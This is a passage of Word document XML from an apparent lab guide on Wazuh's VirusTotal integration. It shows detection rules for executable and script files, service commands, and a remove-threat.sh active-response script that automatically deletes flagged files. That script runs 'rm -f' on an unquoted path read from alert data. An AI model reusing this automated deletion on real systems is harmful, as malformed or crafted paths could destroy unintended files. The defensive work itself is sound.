          <w:p w14:paraId="74E9EC03" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1028D9" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FFBED1C" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="110210" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC45B08" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;550&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE53884" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB60E78" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;.*\.(exe|dll|py|bin)$&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C560EB8" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7FB63D" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;Executable/script file modified — sending hash to VirusTotal (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7EEC59" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="123DCFED" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="685E7669" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="110211" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF186A5" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EC71C04" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678AA882" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;.*\.(exe|dll|py|bin)$&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D6F6229" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45159E0E" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;New executable/script file detected — sending hash to VirusTotal (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C45308E" w14:textId="77777777" w:rsidR="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2F8E63" w14:textId="73E09554" w:rsidR="008641C9" w:rsidRDefault="008641C9" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="008641C9">
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CA2D6B9" w14:textId="77777777" w:rsidR="00AD2791" w:rsidRDefault="00AD2791" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F63F3A" w14:textId="323FF95B" w:rsidR="009E633B" w:rsidRDefault="009E633B" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>After applying the configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">must restart the Wazuh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>server :</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9E633B" w14:paraId="4EA82258" w14:textId="77777777" w:rsidTr="00AD2791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="24B8552B" w14:textId="35469409" w:rsidR="009E633B" w:rsidRPr="009E633B" w:rsidRDefault="009E633B" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="a"/>
            </w:pPr>
            <w:r w:rsidRPr="009E633B">
              <w:t>systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FFC22A4" w14:textId="59AC6658" w:rsidR="00206A45" w:rsidRDefault="00206A45" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00374F3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Verified service status and alert generation:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00206A45" w:rsidRPr="001E2C55" w14:paraId="3816036A" w14:textId="77777777" w:rsidTr="004449CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="46C9C326" w14:textId="77777777" w:rsidR="00206A45" w:rsidRPr="004521E8" w:rsidRDefault="00206A45" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004521E8">
              <w:t>systemctl</w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:rPr>
                <w:color w:val="BBBBBB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:t>status</w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:rPr>
                <w:color w:val="BBBBBB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:t>wazuh-manager</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455063EB" w14:textId="77777777" w:rsidR="00206A45" w:rsidRPr="004521E8" w:rsidRDefault="00206A45" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004521E8">
              <w:t>tail</w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:rPr>
                <w:color w:val="BBBBBB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:t>-f</w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:rPr>
                <w:color w:val="BBBBBB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004521E8">
              <w:t>/var/ossec/logs/alerts/alerts.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EC510DA" w14:textId="0947327A" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="008E02D0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3D7545" w14:textId="77777777" w:rsidR="000812CB" w:rsidRDefault="00036E1D" w:rsidP="00036E1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036E1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Detecting and removing malware using VirusTotal integration</w:t>
      </w:r>
      <w:r w:rsidR="00B719CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA54B18" w14:textId="0F49C5FF" w:rsidR="00901DC7" w:rsidRDefault="00901DC7" w:rsidP="00036E1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">In Ubuntu endpoint : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC33166" w14:textId="58ABABD0" w:rsidR="00B719CC" w:rsidRPr="00901DC7" w:rsidRDefault="00901DC7" w:rsidP="00036E1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1- I</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>n the Wazuh agent configuration file /var/ossec/etc/ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have to</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ake sure that &lt;disabled&gt; is set to no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03216E" w14:textId="41A3F066" w:rsidR="00901DC7" w:rsidRDefault="00901DC7" w:rsidP="00901DC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2- Install jq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> a utility that processes JSON input from the active response scrip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901DC7" w:rsidRPr="001E2C55" w14:paraId="5BAF3ECC" w14:textId="77777777" w:rsidTr="00901DC7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7BDCE18C" w14:textId="77777777" w:rsidR="00901DC7" w:rsidRPr="00901DC7" w:rsidRDefault="00901DC7" w:rsidP="00901DC7">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00901DC7">
              <w:t>sudo apt update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E9780D" w14:textId="63C5A8B3" w:rsidR="00901DC7" w:rsidRDefault="00901DC7" w:rsidP="00901DC7">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00901DC7">
              <w:t>sudo apt -y install jq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78DB4ADD" w14:textId="77777777" w:rsidR="000812CB" w:rsidRDefault="000812CB" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62744808" w14:textId="165292ED" w:rsidR="00DF4440" w:rsidRPr="00DF4440" w:rsidRDefault="00DF4440" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4440">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3- Create the /var/ossec/active-response/bin/remove-threat.sh</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DF4440" w:rsidRPr="0011181E" w14:paraId="48471F82" w14:textId="77777777" w:rsidTr="0011181E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="33D08DEB" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E1482F" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="779B2EC7" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>LOCAL=`dirname $0`;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175E843A" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>cd $LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20036955" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:lastRenderedPageBreak/>
              <w:t>cd ../</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DECA790" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AE5164E" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>PWD=`pwd`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="019583C2" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FEC5FA6" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>read INPUT_JSON</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1E49A9" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.data.virustotal.source.file)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46FC9BFB" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>COMMAND=$(echo $INPUT_JSON | jq -r .command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63F8BFE0" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>LOG_FILE="${PWD}/../logs/active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E5F074" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08468A8E" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>#------------------------ Analyze command -------------------------#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153E1918" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>if [ ${COMMAND} = "add" ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A556758" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="096A423C" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> # Send control message to execd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7BB22A" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> printf '{"version":1,"origin":{"name":"remove-threat","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406EE234" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78E8C2C6" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> read RESPONSE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148516A0" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> COMMAND2=$(echo $RESPONSE | jq -r .command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C1B2CB" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> if [ ${COMMAND2} != "continue" ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F4F834" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE2B04B" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve">  echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Remove threat active response aborted" &gt;&gt; ${LOG_FILE}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C91F913" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve">  exit 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270D20DA" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB20198" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70F3F91C" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AA89FA8" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t># Removing file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1201CCDF" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>rm -f $FILENAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A1D3C82" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>if [ $? -eq 0 ]; then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA73B96" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Successfully removed threat" &gt;&gt; ${LOG_FILE}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A5ED10" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28847D85" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
